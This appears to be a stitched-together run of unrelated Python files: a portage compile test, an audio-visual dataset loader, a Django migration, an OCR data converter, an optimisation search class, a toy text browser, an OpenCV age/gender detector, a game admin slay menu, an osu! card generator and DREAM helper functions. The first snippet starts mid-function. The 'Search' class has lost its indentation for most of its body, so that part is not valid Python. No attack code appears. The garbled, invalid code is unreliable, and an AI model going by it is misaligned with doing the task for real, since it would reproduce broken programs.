    """Return the newest journal date (ISO string) of one user.

    NOTE(review): the user table id is hard-coded — looks like leftover
    debug/demo code; confirm before relying on it.
    """
    return execute('SELECT max(journal_date) from user_109041459781692369999', fetch='one')[0].strftime('%Y-%m-%d')
|
# Copyright 2009-2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
import itertools
import stat
from portage.const import PORTAGE_BIN_PATH, PORTAGE_PYM_PATH
from portage.tests import TestCase
from portage import os
from portage import _encodings
from portage import _unicode_decode, _unicode_encode
import py_compile
class CompileModulesTestCase(TestCase):
    """Byte-compile every portage script/module to catch syntax errors."""

    def testCompileModules(self):
        # Walk both the bin and pym trees of the portage installation.
        for parent, dirs, files in itertools.chain(
            os.walk(PORTAGE_BIN_PATH),
            os.walk(PORTAGE_PYM_PATH)):
            parent = _unicode_decode(parent,
                encoding=_encodings['fs'], errors='strict')
            for x in files:
                x = _unicode_decode(x,
                    encoding=_encodings['fs'], errors='strict')
                # Skip already-compiled artifacts.
                if x[-4:] in ('.pyc', '.pyo'):
                    continue
                x = os.path.join(parent, x)
                st = os.lstat(x)
                # Only regular files (not symlinks/dirs/devices) are candidates.
                if not stat.S_ISREG(st.st_mode):
                    continue
                do_compile = False
                if x[-3:] == '.py':
                    do_compile = True
                else:
                    # Check for python shebang
                    f = open(_unicode_encode(x,
                        encoding=_encodings['fs'], errors='strict'), 'rb')
                    line = _unicode_decode(f.readline(),
                        encoding=_encodings['content'], errors='replace')
                    f.close()
                    if line[:2] == '#!' and \
                        'python' in line:
                        do_compile = True
                if do_compile:
                    # doraise=True turns compile errors into exceptions, which
                    # fail the test; /dev/null discards the bytecode output.
                    py_compile.compile(x, cfile='/dev/null', doraise=True)
|
import os
import random
from .base import BaseDataset
class MUSICMixDataset(BaseDataset):
    """Dataset yielding N-way mixtures of instrument recordings with their
    point-cloud frame data, for audio-visual source separation.

    Each item mixes `opt.num_mix` samples from distinct instrument classes
    (the instrument is presumed to be the parent directory name of the
    sample path — confirm against the sample list format).
    """

    def __init__(self, list_sample, opt, **kwargs):
        super(MUSICMixDataset, self).__init__(
            list_sample, opt, **kwargs)
        self.fps = opt.frameRate           # video frame rate
        self.num_mix = opt.num_mix         # number of sources per mixture
        self.rgbs_feature = opt.rgbs_feature

    def __getitem__(self, index):
        N = self.num_mix
        # Per-source slots, filled below.
        points = [None for n in range(N)]
        coords = [None for n in range(N)]
        rgbs = [None for n in range(N)]
        audios = [None for n in range(N)]
        infos = [[] for n in range(N)]
        path_frames = [[] for n in range(N)]
        path_audios = ['' for n in range(N)]
        # the first point cloud video
        instruments = []
        infos[0] = self.list_sample[index]
        path_instr = self.list_sample[index][0]
        instr = os.path.basename(os.path.dirname(path_instr))
        instruments.append(instr)
        # sample other point cloud videos
        # (seeded by index outside training so val/test mixtures are reproducible)
        if not self.split == 'train':
            random.seed(index)
        # Keep drawing until N distinct instrument classes are collected.
        while len(instruments) != N:
            indexN = random.randint(0, len(self.list_sample)-1)
            path_instr = self.list_sample[indexN][0]
            instr = os.path.basename(os.path.dirname(path_instr))
            if instr not in instruments:
                infos[len(instruments)] = self.list_sample[indexN]
                instruments.append(instr)
        # select point cloud frames
        # Margin keeps the sampled window of num_frames (with stride) in range.
        idx_margin = (self.num_frames // 2) * self.stride_frames
        for n, infoN in enumerate(infos):
            path_audioN, path_frameN, count_framesN = infoN
            center_frameN = random.randint(
                idx_margin+1, int(count_framesN)-idx_margin-1)
            # absolute frame/audio paths
            for i in range(self.num_frames):
                idx_offset = (i - self.num_frames // 2) * self.stride_frames
                path_frames[n].append(
                    os.path.join(
                        path_frameN,
                        '{:05d}.ply'.format(center_frameN + idx_offset)))
            path_audios[n] = path_audioN
        # Load frames/audio via BaseDataset helpers, then mix and STFT.
        for n, infoN in enumerate(infos):
            points[n], coords[n], rgbs[n] = self._load_frames(path_frames[n])
            audios[n] = self._load_audio(path_audios[n])
        mag_mix, mags, phase_mix = self._mix_n_and_stft(audios)
        ret_dict = {'mag_mix': mag_mix, 'mags': mags}
        # Extra ground truth is only returned outside training (for evaluation).
        if self.split != 'train':
            ret_dict['audios'] = audios
            ret_dict['phase_mix'] = phase_mix
            ret_dict['infos'] = infos
        return ret_dict, (coords, points, rgbs, self.rgbs_feature)
|
# Generated by Django 2.2.7 on 2019-11-23 18:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Give compensation.additional_info and .requirements empty-string defaults."""

    dependencies = [
        ('info', '0004_auto_20191123_1854'),
    ]
    operations = [
        migrations.AlterField(
            model_name='compensation',
            name='additional_info',
            field=models.TextField(default='', max_length=2048),
        ),
        migrations.AlterField(
            model_name='compensation',
            name='requirements',
            field=models.TextField(default='', max_length=2048),
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 30 17:35:00 2020
@author: kevin
This file is to convert the NEOCR dataset (with jpg and xml files) to Tesseract friendly format (tif and box files)
Makes it usable for training
"""
import utils
import os
import sys
import cv2
from lxml import etree
# initialize logger
log = utils.set_logging()
# TODO(review): hard-coded absolute input path — consider a CLI argument.
dir_neocr = 'C:/Users/kevin/OneDrive/Studium/4_WiSe20_21/1_W3-WM/app_data/NEOCR/neocr_smallset_kevin'
log.info('Start handling directory ' + str(dir_neocr))
listOfFiles = os.listdir(dir_neocr)
total_images = len(listOfFiles)
image_counter = 0
# Output directory next to this script.
script_dir = os.path.dirname(os.path.abspath(__file__))
target_path = os.path.join(script_dir, 'NEOCR_TIF_BOX')
# Fix: the loop below writes into target_path but nothing created it;
# ensure it exists before conversion starts.
os.makedirs(target_path, exist_ok=True)
# Convert each NEOCR jpg to tif and each annotation xml to a Tesseract .box
# file (one "text left bottom right top page" line per labelled region).
for file in listOfFiles:
    image_counter = image_counter + 1
    log.info('Start handling image ' + str(image_counter) + ' of ' + str(total_images) + ': ' + str(file))
    try:
        file_path = os.path.join(dir_neocr, file)
        # handle jpg files
        if file[-3:] == 'jpg':
            image = cv2.imread(file_path)
            filename_tif = file[0:-4] + '.tif'
            cv2.imwrite(os.path.join(target_path, filename_tif), image)
        # handle xml files
        if file[-3:] == 'xml':
            tree = etree.parse(file_path)
            root = tree.getroot()
            # Image height is needed to flip y: box files count from the bottom.
            for child in root.findall('properties'):
                for x in child.findall('height'):
                    height = int(x.text)
            xml_data = ''
            for obj in root.findall('object'):
                polygon = obj.find('polygon')
                x_values = []
                y_values = []
                for pt in polygon.findall('pt'):
                    x_values.append(int(pt.find('x').text))
                    y_values.append(int(pt.find('y').text))
                # Line breaks and spaces inside the label become semicolons.
                symbol = obj.find('text').text.replace('<br/>', ';').replace(' ', ';')
                # NOTE(review): assumes the polygon points are listed in a fixed
                # corner order (0=top-left, 1=right, 2=bottom) — confirm.
                left = x_values[0]
                bottom = height - y_values[2]
                right = x_values[1]
                top = height - y_values[0]
                page = 0
                xml_data = xml_data + symbol + ' ' + str(left) + ' ' + str(bottom) + ' ' + str(right) + ' ' + str(top) + ' ' + str(page) + '\n'
            filename_box = file[0:-4] + '.box'
            box_file = open(os.path.join(target_path, filename_box), 'w', encoding='utf-8')
            # box_file = open(filename_box, 'w', encoding='utf-8')
            box_file.write(xml_data)
            box_file.close()
    except Exception as e:
        # Best-effort conversion: log and continue with the next file.
        log.error('There was a problem handling the image ' + str(file) + ': ' + str(e))
from django.urls import path
from tweet.views import homepage
urlpatterns = [
    # Route /tweet to the homepage view; reversible by the name 'tweet'.
    path('tweet', homepage, name='tweet'),
]
#!/usr/bin/env python3
import logging
log=logging.getLogger('fea.search')
import numpy as np
from .Halfspace import Halfspace
from .util import lstsq
from .VWrapper import VWrapper
class Search:
_multiplier=10
_max_iterations=10
def __init__(self,model,vars,eps=10**-6,clone=True):
"""
Class for an FEA searcher for finding new halfspaces
This is separated from :class:`fea.LatticeGraph` to enable future parallelization
Parameters
----------
model : :class:`optlang.Model`
The model to solv
vars : iterable
A list of target variables contained in the model
eps : float
Detection limit. Default 1E-6
clone : bool
Whether to clone the model or just use the existing one
"""
self.interface=model.interface
if clone:
self.m=self.interface.Model.clone(model)
else:
self.m=model
# Variables
self.v=[VWrapper(v,self.m) for v in vars]
# Detection Limit
self.eps=eps
# Length
self.n=len(self.v)
# Halfspaces
self.H=None
# Current halfspace constraint
self.H_cons=None
# Objective
self.O=None
def deactivate(self):
"""Remove the current constraint"""
self.m.remove(self.H_cons)
def activate(self):
"""Add the current constraint"""
self.m.add(self.H_cons)
self.m.objective=self.interface.Objective(np.dot(self.O,self.vexpr))
def set(self,obj,hps):
"""Set the current constraint
Parameters
----------
obj: :class:`numpy.ndarray`
The objective function vector
hps: iterable of :class:`fea.Halfspace`
List of Halfspaces to use as the current solution
"""
# Deactivate previous constraints
if self.H_cons is not None:
self.deactivate()
# Update the search for a new search
self.H=list(hps)
# self.H_cons=[h._ol_new_constraint(self.vexpr,self.interface,eps=self.eps) for h in self.H]
self.H_cons=[h._ol_new_constraint(self.m,eps=self.eps) for h in self.H]
self.O=obj/np.linalg.norm(obj)
# Go ahead and activate the new problem
self.activate()
@property
def vexpr(self):
"""Variable expressions"""
return [v.expr for v in self.v]
@property
def vp(self):
"""Variable primal values"""
return [v.primal for v in self.v]
@property
def vd(self):
"""Variable dual values"""
return [v.dual for v in self.v]
def Hd(self,i=None):
"""
Halfspace duals
Parameters
----------
i: int
Optional index of which halfspace to get the dual from. Defaults to all
Returns
-------
Halfspace dual values
"""
if i is not None:
return self.H[i]._ol_dual(self.m)
return [h._ol_dual(self.m) for h in self.H]
def Heps(self,i=None):
"""
Halfspace epsilon values
Parameters
----------
i: int
Optional index of which halfspace to get the epsilon from. Defaults to all
Returns
-------
Halfspace epsilon values
"""
if i is not None:
return self.H[i]._ol_eps(self.m)
return [h._ol_eps(self.m) for h in self.H]
    def get_solution(self,_i=0):
        """
        Attempt to solve the currently set problem, retrying with perturbed
        constraints when the solver does not report optimality.

        Parameters
        ----------
        _i: int
            Internal retry counter; callers should not pass it.
            NOTE(review): the retry limit ``self._max_iterations`` is defined
            outside this view (presumably a class attribute) — confirm.

        Returns
        -------
        Boolean indicating whether an optimal solution was found.
        """
        self.m.optimize()
        if self.m.status != 'optimal': # Could also check whether =='infeasible'
            log.info('Solver returned status of '+self.m.status)
            # Perturb one constraint and recurse, up to the retry limit
            if _i<self._max_iterations:
                self.perturb_cons()
                return self.get_solution(_i+1)
            else:
                return False
        log.info('Optimal solution obtained at '+str(self.vp))
        return True
    # Randomly (unless otherwise specified) shift a halfspace constraint
    def perturb_cons(self,index=None):
        """
        Perturb one halfspace constraint by a random epsilon to escape a
        non-optimal solver state.

        Parameters
        ----------
        index: int
            Optional index of the constraint to perturb; chosen at random
            when omitted.
        """
        if index is None:
            index=np.random.randint(len(self.H))
        # Random shift bounded by this halfspace's current epsilon
        eps=np.random.uniform(high=self.Heps(index))
        if log.getEffectiveLevel()<=10: # Somewhat expensive logging operation
            log.info('Changing '+str(self.H[index])+' to have eps='+str(eps))
        rhs=self.H[index].rhs+eps
        # Clear ub first so lb never crosses the (stale) upper bound
        self.H_cons[index].ub=None
        self.H_cons[index].lb=rhs
        self.H_cons[index].ub=rhs
    # Returns a real Facet or None if it couldn't find anything!
    def bounding_halfspace(self):
        """
        Find a bounding halfspace for this search by solving a least-squares
        system built from the active constraints and their shadow prices.
        Falls back to :meth:`psuedo_halfspace` whenever the system is
        under-determined or the least-squares solve fails.

        Returns
        -------
        :class:`fea.Halfspace` representing a new bound for the search
        """
        # NOTE(review): ssemax is computed but never used below — dead code?
        ssemax=(self.eps**2)*self.n
        # Seed the system with the (normalized) objective direction
        A=[self.O]
        b=[-1]
        A1_base=np.array([h.norm for h in self.H]+[self.O])
        b1_base=np.array([h._ol_rhs(self.m) for h in self.H]+[self.m.objective.value])
        # If we don't have enough constraints/duals to fully determine the system!
        if len(b1_base)<self.n-1:
            log.info('Insufficient Equations')
            return self.psuedo_halfspace()
        # Loop Through Shadow Prices: bump each RHS (and the objective row by
        # the corresponding dual) and solve for the displaced point
        for i,(h,hd) in enumerate(zip(self.H,self.Hd())):
            log.info('Considering '+str(h)+" ~ "+str(hd))
            # TODO: We may not want/need this if statement. A basic halfspace still gives information (i.e. it's perpendicular)
            A1=np.copy(A1_base)
            b1=np.copy(b1_base)
            b1[i]+=self._multiplier
            b1[-1]+=self._multiplier*hd
            try:
                # Direction from the current primal point to the displaced solution
                newA=lstsq(A1,b1,self.eps)-self.vp
                A+=[newA]
                b+=[0]
            except ValueError:
                log.info('LstSq Error.')
        # If we can't get enough values to fully determine the system! (This step should only occur when facet duals are 0, which they really shouldn't be)
        if len(A)<self.n:
            log.info('Insufficient Duals')
            return self.psuedo_halfspace()
        # Now, solve for the overall solution
        try:
            log.info('Solving for bounding facet')
            nh=Halfspace(self.vexpr,lstsq(A,b,self.eps),self.vp,eps=self.eps,interface=self.interface)
            return nh
        except ValueError:
            # TODO: Could this be orthoganol?
            log.error('Could not find the bounding facet.')
            return self.psuedo_halfspace()
    def psuedo_halfspace(self):
        """Return a pseudo-halfspace when a true bounding one cannot be found.

        The pseudo-halfspace points opposite the objective (``-O``) through the
        current primal point and is flagged ``real=False``.
        (Method name keeps the original 'psuedo' spelling — renaming would
        break external callers.)

        Returns
        -------
        :class:`fea.Halfspace` object representing a new pseudo-halfspace
        """
        return Halfspace(self.vexpr,-self.O,self.vp,real=False,eps=self.eps,interface=self.interface,required=set(self.H))
|
# CMSSW configuration: load the IPHC FlatTree producer's MINIAOD config,
# which defines the `process` and `cms` objects used below.
from IPHCFlatTree.FlatTreeProducer.ConfFile_MINIAOD_cfg import *
# Run over all events in the input file (-1 = no limit)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
# Output ROOT file for the flat tree
process.TFileService.fileName = cms.string("FlatTree.root")
# RelVal TTbar sample for local tests
process.source.fileNames = cms.untracked.vstring('file:./RelValTTbar_13_CMSSW_7_3_0-MCRUN2_73_V7-v1_MINIAODSIM-file1.root')
|
#!/usr/local/bin/python3.8
'''
Name hiding (aka shadowing): a parameter assigned inside a function only has
meaning while the function runs; it shadows the outer variable of the same
name instead of rebinding it. Outside the call, the module-level variable is
used unchanged.
'''
y = 5
def set_y(y):
    # This `y` is the parameter, shadowing the module-level `y` above.
    print ('Inner y:', y)
set_y(10) # Inner y: 10
print('Outter y:', y) # Outter y: 5
# *******************************************************************
# *** Text based browser project of Hyperskill.org ***
# *******************************************************************
#
# Tests require Cachefile to be free of html Tags
# requires modification of function get_page()
#
#
#
import os
import sys
import requests
from bs4 import BeautifulSoup
from colorama import init, Fore
class Color:
    """ANSI escape sequences for coloring/styling terminal output."""
    PURPLE = '\033[95m'
    CYAN = '\033[96m'
    DARKCYAN = '\033[36m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    # END resets all attributes back to the terminal default
    END = '\033[0m'
def filename(url):
    """Convert a URL into a flat cache-file name.

    Strips a leading http(s) scheme, replaces every '/' with '_', drops any
    query string (everything from the first '?'), and appends '.txt'.
    """
    # startswith() replaces the manual slice comparisons
    if url.startswith('https://'):
        name = url[8:]
    elif url.startswith('http://'):
        name = url[7:]
    else:
        name = url
    name = name.replace('/', '_')
    # str.split replaces the manual index-hunting loop; with no '?' present
    # the name is returned unchanged.
    name = name.split('?', 1)[0]
    return name + '.txt'
def read_cached(name, path):
    """Return the cached page text for *name* under *path*, or False if absent."""
    cache_path = f'{path}/{name}'
    if not os.path.isfile(cache_path):
        return False
    with open(cache_path, encoding='utf-8') as cache:
        return cache.read()
def write_cached(name, path, webpage):
    """Write *webpage* (a string, or any iterable of fragments) to the cache file."""
    with open(f'{path}/{name}', 'w', encoding='utf-8') as cache:
        cache.write(''.join(f"{fragment}" for fragment in webpage))
def output(parts):
    """Render a list of BeautifulSoup nodes/strings to the terminal.

    Recurses into tags that contain more than one child; leaf tags are
    printed with simple per-tag styling (links in blue, titles/strong in
    bold). Unknown tags are silently skipped.
    """
    for tag in parts:
        # Nested tags? => recurse with the child list instead of printing
        try:
            new = list(tag.children)
            if len(new) > 1:
                output(list(tag.children))
                continue
        except:
            # NOTE(review): bare except — plain strings have no .children, but
            # this also swallows any other error; consider AttributeError.
            pass
        # No nested tags? Proceed with leaf rendering
        if isinstance(tag, str):
            print(tag, end='')
        elif tag.name == 'a':
            print(Fore.BLUE + tag.get_text() + Fore.BLACK, end='')
        elif tag.name == 'title':
            print(Color.BOLD + tag.get_text() + Color.END)
        elif tag.name == 'span':
            print(tag.get_text())
        elif tag.name == 'strong':
            print(Color.BOLD + tag.get_text() + Color.END, end='')
        elif tag.name == 'p':
            print(tag.get_text())
        elif tag.name == 'br':
            pass
        elif tag.name is None:
            pass
        else:
            pass
def scrape(webpage):
    """Parse *webpage* HTML and render its title plus every paragraph."""
    soup = BeautifulSoup(webpage, 'html.parser')
    output(soup.title)
    for paragraph in soup.find_all('p'):
        output(list(paragraph.children))
def get_page(url, path):
    """Show the page at *url*, serving from the cache under *path* when possible.

    On a cache hit the stored text is rendered directly. On a miss the page
    is fetched; success (any 2xx/3xx status) caches the raw text and renders
    the parsed HTML, failure prints the status code.
    """
    name = filename(url)
    cached = read_cached(name, path)
    if cached:
        scrape(cached)
        return
    tab = requests.get(url)
    if 200 <= tab.status_code < 400:
        # The tests expect the cache file to hold tag-free page text,
        # hence tab.text is cached while tab.content is rendered.
        write_cached(name, path, tab.text)
        scrape(tab.content)
    else:
        print(f'Error:{tab.status_code}')
#########################################
### Program starts here #################
#########################################
# Initialize colorama so ANSI colors work on Windows too
init()
# Optional first CLI argument: cache directory name
args = sys.argv
if len(args) >= 2:
    dir_name = args[1]
else:
    dir_name = 'resources'
if not os.path.isdir(dir_name):
    os.mkdir(dir_name)
# Visited-page stack for the 'back' command
history = []
command = input()
if command == '':
    # NOTE(review): default looks like a typo — probably meant 'docs.python.org'.
    command = 'doc.python.org'
while command != "exit":
    page = command
    if '.' not in page:
        # No dot => cannot be a hostname
        print('error : Incorrect URL')
    elif page[0:4] != 'http':
        # Bare hostname: assume https
        page = 'https://' + command
        get_page(page, dir_name)
    else:
        page = command
        get_page(page, dir_name)
    # Next command = 'back' ?
    command = input()
    if command == 'back':
        if len(history) > 0:
            command = history.pop()
        else:
            command = 'exit'
    else:
        # NOTE(review): invalid URLs are pushed onto history too — confirm intended.
        history.append(page)
|
import cv2
import numpy as np
# NOTE(review): matplotlib is imported but never used here
import matplotlib.pyplot as plt
# Load and display an image until any key is pressed
img=cv2.imread("camera.png")
cv2.imshow("Camera",img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
import unittest
from katas.kyu_7.unlimited_sum import sum
class UnlimitedSumTestCase(unittest.TestCase):
    """Tests for the kyu-7 'unlimited sum' kata's variadic sum()."""
    def test_equals(self):
        # Plain integers sum normally.
        self.assertEqual(sum(1, 2, 3), 6)
    def test_equals_2(self):
        # Presumably non-int arguments are ignored (1 + 2 = 3) — confirm
        # against the kata statement.
        self.assertEqual(sum('1', 1, '2', 2), 3)
|
from nose.tools import *
def test_message_storage_consistency():
    """A Message must retain the exact user, channel, and text it was built with."""
    from espresso.user import User
    from espresso.message import Message

    author = User("f00f", "jimmy depreaux")
    text = "watch out for traffic!"
    channel = "safety-warnings"

    msg = Message(author, channel, text)

    assert msg.user is author
    assert msg.text == text
    assert msg.channel == channel
def test_message_matching():
    """Message.match returns None on a miss and a truthy result on a hit."""
    from espresso.user import User
    from espresso.message import Message

    author = User("f00f", "jimmy depreaux")
    msg = Message(author,
                  "safety-warnings",
                  "watch out for traffic!")

    assert msg.match("asdfasdf") is None
    assert msg.match("watch out") is not None
# Age and Gender detection of a person based on the image by passing it to the machine learning algorithm
# importing required modules
import cv2 as cv
# import time
# extracting face of the person from image
# extracting face of the person from image
def extract_face(net, image, conf_threshold=0.7):
    """Detect faces in *image* with DNN *net*.

    Returns a copy of the image with green boxes drawn around detections
    above *conf_threshold*, plus the list of [x1, y1, x2, y2] boxes.
    """
    frame = image.copy()
    f_height = frame.shape[0]  # frame height
    f_width = frame.shape[1]  # frame width
    # blobFromImage sets scalefactor, size, mean, swapRB, crop for the net input
    blob_img = cv.dnn.blobFromImage(frame, 1.0, (300, 300), [104, 117, 123], True, False)
    net.setInput(blob_img)
    detections = net.forward()
    b_boxes = []
    for i in range(detections.shape[2]):
        confidence = detections[0, 0, i, 2]
        if confidence > conf_threshold:
            # Detection coords are normalized [0,1]; scale to pixel space
            x1 = int(detections[0, 0, i, 3] * f_width)
            y1 = int(detections[0, 0, i, 4] * f_height)
            x2 = int(detections[0, 0, i, 5] * f_width)
            y2 = int(detections[0, 0, i, 6] * f_height)
            b_boxes.append([x1, y1, x2, y2])
            cv.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), int(round(f_height / 150)), 8)
    return frame, b_boxes
# Model files: each network needs its architecture file plus trained weights.
face_Proto = "models/opencv_face_detector.pbtxt"  # protocol buffer (graph text)
face_Model = "models/opencv_face_detector_uint8.pb"
age_Proto = "models/age_deploy.prototxt"  # age model architecture
age_Model = "models/age_net.caffemodel"  # trained age weights
gender_Proto = "models/gender_deploy.prototxt"  # gender model architecture
gender_Model = "models/gender_net.caffemodel"  # trained gender weights
# Per-channel mean values the age/gender Caffe models were trained with
MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)
# Output categories (indices match the networks' softmax outputs)
age_category = ['(0-3)', '(4-7)', '(8-15)', '(16-23)', '(24-33)', '(34-45)', '(46-54)', '(55-100)']
gender_category = ['Male', 'Female']
# loading the networks - face, age and gender
face_network = cv.dnn.readNet(face_Model, face_Proto)
age_network = cv.dnn.readNet(age_Model, age_Proto)
gender_network = cv.dnn.readNet(gender_Model, gender_Proto)
# Pixels of context kept around each detected face before classification
padding = 20
# age and gender detection of the person based on the image
def age_gender_detector(image):
    """Detect faces in *image*, classify age and gender for each, and return
    the annotated frame. Predictions are also printed to the console."""
    # t = time.time()
    frame_face, b_boxes = extract_face(face_network, image)
    for bbox in b_boxes:
        # Crop the face with `padding` pixels of context, clamped to the image
        face = image[max(0, bbox[1] - padding):min(bbox[3] + padding, image.shape[0] - 1),
               max(0, bbox[0] - padding):min(bbox[2] + padding, image.shape[1] - 1)]
        blob = cv.dnn.blobFromImage(face, 1.0, (227, 227), MODEL_MEAN_VALUES, swapRB=False)
        gender_network.setInput(blob)
        gender_pred = gender_network.forward()
        gender = gender_category[gender_pred[0].argmax()]
        # Display detected gender of the input image on to console
        print("Gender Output: {}, conf = {:f}".format(gender, gender_pred[0].max()))
        age_network.setInput(blob)
        age_pred = age_network.forward()
        age = age_category[age_pred[0].argmax()]
        # Display detected age of the input image on to console
        print("Age Output : {}".format(age_pred))
        print("Age : {}, conf = {:f}".format(age, age_pred[0].max()))
        frame_label = "{},{}".format(age, gender)
        font = cv.FONT_ITALIC
        color = (0, 0, 255)
        # putText renders the label just above the face's bounding box
        cv.putText(frame_face, frame_label, (bbox[0], bbox[1] - 10), font, 0.8, color, 2,
                   cv.FILLED)
    return frame_face
# displaying the output image along with age and gender indication
input_image = cv.imread("rh.PNG")
output_image = age_gender_detector(input_image)
cv.imshow("image", output_image)
cv.waitKey(0)
from menus import PagedMenu, PagedOption, Text
from filters.players import PlayerIter
from admin.commands.punishment import Punishment
from ..strings import menus
from .playercommands import PlayerCommandsMenu
# Bug fix: the trailing comma is required — ('SlayPlayer') is just a
# parenthesized string, not a one-element tuple.
__all__ = (
    'SlayPlayer',
)
class SlayPlayer(PlayerCommandsMenu):
    """Menu used to slay players.

    NOTE(review): class docstring said 'kick' — this menu slays (see select).
    """
    caption = menus['Slay Menu']
    # Admin flag required to see/use this menu
    needed_flag = 'admin.slay'

    @staticmethod
    def select(menu, index, choice):
        """Slay the chosen player and keep the menu open."""
        Punishment.slay(choice.value, owner=index)
        return menu

    @staticmethod
    def build(menu, index):
        """Rebuild the menu with every connected player as an option."""
        menu.clear()
        for player in PlayerIter():
            menu.append(PagedOption(player.name, player))

    @classmethod
    def menu(cls):
        """Return a fresh PagedMenu wired to this class's callbacks."""
        return PagedMenu(
            title=cls.caption,
            build_callback=cls.build,
            select_callback=cls.select
        )
|
# 使用拓展
import json
import os
import requests
from wand.drawing import Drawing
from wand.image import Image
# Configuration parameters
key = ''  # osu! API key from ppy; request one at https://osu.ppy.sh/p/api if you don't have one.
# osu! (ppy) API request section.
def ppyrequest(apikey: str, beatmaps_id: str, pool: str, name: str):
    """Fetch beatmap metadata, build a shortened "artist - title" label, and
    kick off cover-image download/rendering via loadimage()."""
    url = 'https://osu.ppy.sh/api/get_beatmaps?k=' + apikey + '&b=' + beatmaps_id
    r = requests.get(url)
    hjson = json.loads(r.text)
    # Prefer the unicode artist/title; fall back to ASCII when unicode is null
    artist = hjson[0]['artist_unicode']
    title = hjson[0]['title_unicode']
    artist2 = hjson[0]['artist']
    title2 = hjson[0]['title']
    # len() raises on None => the unicode field was null, use the ASCII one.
    # NOTE(review): bare except also hides other errors.
    try:
        len(artist)
    except:
        artist = hjson[0]['artist']
    try:
        len(title)
    except:
        title = hjson[0]['title']
    # Truncate long titles: ASCII titles get a shorter cut (12) unless very
    # long (22); genuinely-unicode titles only cut at 22 (wide glyphs).
    if hjson[0]['title_unicode'] is not None and len(title) > 12:
        if title == title2:
            if len(title) >= 22:
                title = title[:22] + '...'
            else:
                title = title[:12] + '...'
        else:
            if len(title) >= 22:
                title = title[:22] + '...'
    # Same scheme for the artist with smaller thresholds (8 / 14)
    if hjson[0]['artist_unicode'] is not None and len(artist) > 8:
        if artist == artist2:
            if len(artist) >= 14:
                artist = artist[:14] + '...'
            else:
                artist = artist[:8] + '...'
        else:
            if len(artist) >= 14:
                artist = artist[:14] + '...'
    output = artist + ' - ' + title
    diffname = hjson[0]['version']
    beatmapset_id = hjson[0]['beatmapset_id']
    loadimage(beatmapset_id, output, diffname, pool, name)
# Download the beatmap cover image from ppy's asset server to a local file.
def loadimage(beatmapset_id: str, title: str, diffname: str, pool: str, name: str):
    """Fetch the cover for *beatmapset_id* to export.jpg, then hand off to
    imageprocess().

    Bug fix: the file is opened in 'wb' (truncate) mode via a context
    manager; the old append mode ('ab') corrupted the image whenever a stale
    export.jpg survived a previous failed run.
    """
    url = 'https://assets.ppy.sh/beatmaps/' + beatmapset_id + '/covers/cover.jpg'
    img = requests.get(url)
    with open('export.jpg', 'wb') as ex:
        ex.write(img.content)
    imageprocess(title, diffname, pool, name)
# Crop the downloaded cover with ImageMagick (wand).
def imageprocess(title: str, diffname: str, pool: str, name: str):
    """Crop export.jpg to the 514x74 banner strip, save it as export.png,
    delete the jpg, and continue to imagecomposite()."""
    with Image(filename='export.jpg')as img:
        img.crop(0, 0, 514, 74)
        img.save(filename='export.png')
    os.remove('export.jpg')
    imagecomposite(title, diffname, pool, name)
# Compose the final card image with ImageMagick (wand).
def imagecomposite(title: str, diffname: str, pool: str, name: str):
    """Layer the cropped cover, frame, text, and pool icon into a 550x110
    card saved as export/<name>.png; the temporary export.png is removed."""
    out = Image(width=550, height=110)
    bg = Image(filename='export.png')
    r = Image(filename='frame.png')
    icon = Image(filename='image/' + pool + '.png')
    with Drawing() as draw:
        # Cover strip inset inside the frame
        draw.composite(operator='undefined', left=18, top=18, width=bg.width, height=bg.height, image=bg)
        draw.composite(operator='darken', left=0, top=0, width=r.width, height=r.height, image=r)
        # Title line
        draw.font = 'font.ttf'
        draw.font_size = 24
        draw.fill_color = 'white'
        draw.text(34, 52, title)
        # Difficulty name line
        draw.font_size = 20
        draw.fill_color = 'white'
        draw.text(34, 76, diffname)
        # Pool icon in the bottom-right corner
        draw.composite(operator='atop', left=436, top=59, width=92, height=28, image=icon)
        draw(out)
    out.save(filename='export/' + name + '.png')
    os.remove('export.png')
# Read the input list file and process each entry.
def contenttolist():
    """Process list.txt (one "beatmap_id,pool" pair per line), rendering one
    card per entry named by its line index.

    Fixes: the file handle is closed via a context manager (it was leaked),
    blank lines (e.g. a trailing newline) no longer raise IndexError, and
    enumerate() replaces the manual range(len(...)) loop.
    """
    with open('list.txt') as listing:
        entries = listing.read().split('\n')
    for index, entry in enumerate(entries):
        if not entry.strip():
            # Skip blank lines instead of crashing on entry.split(',')[1]
            continue
        fields = entry.split(',')
        bid = fields[0]
        pool = fields[1]
        ppyrequest(key, bid, pool, name=str(index))


# Execution starts here, top to bottom.
contenttolist()
|
"""
This file defines a number of convenience functions which make it
easier to work interactively with the DREAM Python interface.
"""
from .DREAMOutput import DREAMOutput
from .DREAMException import DREAMException
# Declare global variables
_wholist = []
def setup_interactive(do, glob):
    """
    Sets up an interactive session by defining all unknowns as
    global variables and assigning to them from the given
    DREAM output.

    do:   DREAMOutput object, or name of an output file to load.
    glob: Global environment seen by the caller (this should
          literally be 'globals()')
    """
    global _wholist

    # isinstance() replaces `type(do) == str`, also accepting str subclasses
    if isinstance(do, str):
        do = DREAMOutput(do)
    elif not isinstance(do, DREAMOutput):
        raise DREAMException("Unrecognized type of input parameter. Type: {}".format(type(do)))

    _wholist = list(do.eqsys.keys())

    # Declare unknowns in the caller's global namespace
    for uqn in do.eqsys.keys():
        glob[uqn] = do.eqsys[uqn]

    # Declare other useful stuff
    glob['grid'] = do.grid
    glob['other'] = do.other
    glob['solver'] = do.solver

    print('Loaded {} unknowns ({})'.format(len(do.eqsys.keys()), do.getFileSize_s()))
    print(do.grid)
    who()
def who():
    """
    Print the (case-insensitively sorted) list of unknowns loaded by
    setup_interactive(). Note: sorts the module-level _wholist in place.
    """
    global _wholist
    print('Unknowns:')
    _wholist.sort(key=str.casefold)
    for idx, unknown in enumerate(_wholist):
        prefix = '  {}' if idx == 0 else ', {}'
        print(prefix.format(unknown), end="")
    print("")
|
